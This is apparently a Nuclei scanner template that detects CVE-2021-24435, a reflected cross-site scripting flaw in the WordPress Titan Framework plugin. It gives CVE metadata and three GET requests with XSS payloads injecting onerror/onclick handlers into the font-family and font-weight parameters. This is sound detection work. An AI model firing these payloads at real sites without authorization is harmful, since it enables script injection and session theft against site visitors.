nuclei-templates/http/cves/2021/CVE-2021-24435.yaml

58 lines
2.5 KiB
YAML

id: CVE-2021-24435
info:
name: WordPress Titan Framework plugin <= 1.12.1 - Cross-Site Scripting
author: xcapri,ritikchaddha
severity: medium
description: |
The iframe-font-preview.php file of the titan-framework does not properly escape the font-weight and font-family GET parameters before outputting them back in an href attribute, leading to Reflected Cross-Site Scripting issues.
impact: |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
remediation: Fixed in version 2.7.12
reference:
- https://wpscan.com/vulnerability/a88ffc42-6611-406e-8660-3af24c9cc5e8
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24435
- https://nvd.nist.gov/vuln/detail/CVE-2021-24435
- https://patchstack.com/database/vulnerability/titan-framework/wordpress-titan-framework-plugin-1-12-1-reflected-cross-site-scripting-xss-vulnerability
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-24435
cwe-id: CWE-79
epss-score: 0.0014
epss-percentile: 0.49412
cpe: cpe:2.3:a:gambit:titan_framework:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 3
vendor: gambit
product: titan_framework
framework: wordpress
tags: cve2021,cve,wp,xss,wp-plugin,titan-framework,wpscan,wordpress,gambit
http:
- method: GET
path:
- "{{BaseURL}}/titan-framework/lib/iframe-font-preview.php?font-type=google&font-family=%27/onerror=%27alert(document.domain)%27/b=%27"
- "{{BaseURL}}/titan-framework/lib/iframe-font-preview.php?font-type=google&font-family=aaaaa&font-weight=%27%20onerror=alert(document.domain)%20b=%27"
- "{{BaseURL}}/titan-framework/lib/iframe-font-preview.php?font-type=google&font-family=aaaaa&font-weight=%27%20accesskey=%27x%27%20onclick=%27alert(document.domain)%27%20class=%27"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: header
words:
- "text/html"
- type: regex
regex:
- (?i)(onerror=|onclick=)['"]?alert\(document\.domain\)['"]?
- '<p>Grumpy wizards make'
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100da70958e684edc68fe4c4d88345ec5b1b08fb4d3e73caa73ba699a89e77c7b47022100fc5c5bb6df4c8300d2da11a1285bab714b585b552f94a8ad22b04284e7e584f3:922c64590222798bb761d5b6d8e72950